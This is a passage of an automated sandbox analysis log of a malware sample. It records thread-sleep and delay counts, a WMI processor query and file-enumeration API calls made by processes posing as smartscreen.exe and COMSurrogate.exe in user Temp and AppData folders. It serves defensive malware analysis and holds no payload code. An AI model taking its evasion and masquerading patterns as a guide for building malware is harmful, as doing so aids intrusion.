                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5832Thread sleep count: 6515 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5832Thread sleep count: 1547 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4576Thread sleep time: -6456360425798339s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5344Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 6864Thread sleep count: 70 > 30
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 6864Thread sleep time: -70000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 5316Thread sleep count: 136 > 30
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 5316Thread sleep time: -136000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep count: 33 > 30
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -30437127721620741s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -100000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2388Thread sleep count: 4656 > 30
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2388Thread sleep count: 5134 > 30
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -99855s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -99750s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -99640s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -99531s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -99421s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -99312s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -99202s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -99093s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -98984s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -98874s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -98760s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -98656s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -98403s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -98296s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -98071s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -97968s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -97859s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -97750s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -97640s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -97531s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -97418s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -97310s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -97203s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -97093s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -96979s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -96874s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -96765s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -96656s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -96546s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -96437s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -96328s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -96218s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -96109s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -95994s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -95890s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -95764s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -95583s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -95454s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -95328s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -95218s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -95109s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -94999s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -94887s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -94779s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -94670s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -94561s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -94452s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -94343s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -94234s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 4800Thread sleep count: 44 > 30
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 4800Thread sleep time: -44000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 3880Thread sleep count: 46 > 30
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 3880Thread sleep time: -46000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -27670116110564310s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -100000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 4052Thread sleep count: 4625 > 30
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 4052Thread sleep count: 5173 > 30
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -99873s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -99764s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -99656s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -99546s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -99437s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -99328s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -99218s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -99109s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -98999s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -98890s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -98780s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -98671s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -98562s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -98452s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -98343s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -98234s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -98111s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -97953s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -97823s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -97500s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -97265s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -97156s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -97040s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -96922s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -96812s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -96702s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -96593s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -96484s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -96374s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -96265s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -96156s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -96046s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -95937s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -95828s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -95718s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -95603s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -95484s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -95375s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -95265s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -95156s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -95046s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -94934s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -94827s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -94602s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -94484s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -94369s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -94259s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -94147s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -94031s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524 Thread sleep time: -93921s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * FROM WIN32_Processor
                                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com Last function: Thread delayed
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe Last function: Thread delayed
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com Thread sleep count: Count: 4443 delay: -10
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exe Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exe Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr Code function: 18_2_00694005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00694005
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr Code function: 18_2_0069C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_0069C2FF
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr Code function: 18_2_0069494A GetFileAttributesW,FindFirstFileW,FindClose,18_2_0069494A
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr Code function: 18_2_0069CD14 FindFirstFileW,FindClose,18_2_0069CD14
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr Code function: 18_2_0069CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,18_2_0069CD9F
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr Code function: 18_2_0069F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_0069F5D8
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr Code function: 18_2_0069F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_0069F735
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr Code function: 18_2_0069FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_0069FA36
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr Code function: 18_2_00693CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00693CE2
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr Code function: 18_2_00645D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,18_2_00645D13
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 100000
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 99875
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 99765
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 99656
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 99546
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 99437
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 99327
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 99215
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 98917
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 98690
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 98561
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 98453
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 98343
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 98228
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 98118
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 98015
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 97904
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 97796
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 97687
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 97578
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 97468
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 97359
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 97239
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 97115
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96977
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96868
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96765
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96654
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96546
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96437
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96317
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96161
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96031
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 95879
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 95750
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 95627
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 95500
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 95390
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 95281
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 95172
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 95047
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 94937
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 94828
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 94718
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 94609
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 94499
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 94390
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 94280
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 94171
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 94061
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 93952
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 93843
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 100000
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 99855
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 99750
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 99640
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 99531
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 99421
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 99312
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 99202
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 99093
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 98984
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 98874
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 98760
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 98656
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 98403
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 98296
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 98071
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 97968
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 97859
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 97750
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 97640
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 97531
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 97418
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 97310
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 97203
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 97093
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96979
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96874
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96765
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96656
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96546
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96437
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96328
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96218
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 96109
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 95994
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 95890
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 95764
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 95583
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 95454
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 95328
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 95218
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 95109
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 94999
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 94887
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 94779
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 94670
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 94561
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 94452
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 94343
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 94234
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 100000
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 99873
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 99764
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 99656
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 99546
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 99437
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 99328
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 99218
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 99109
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 98999
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 98890
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 98780
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 98671
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 98562
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 98452
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 98343
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Thread delayed: delay time: 98234
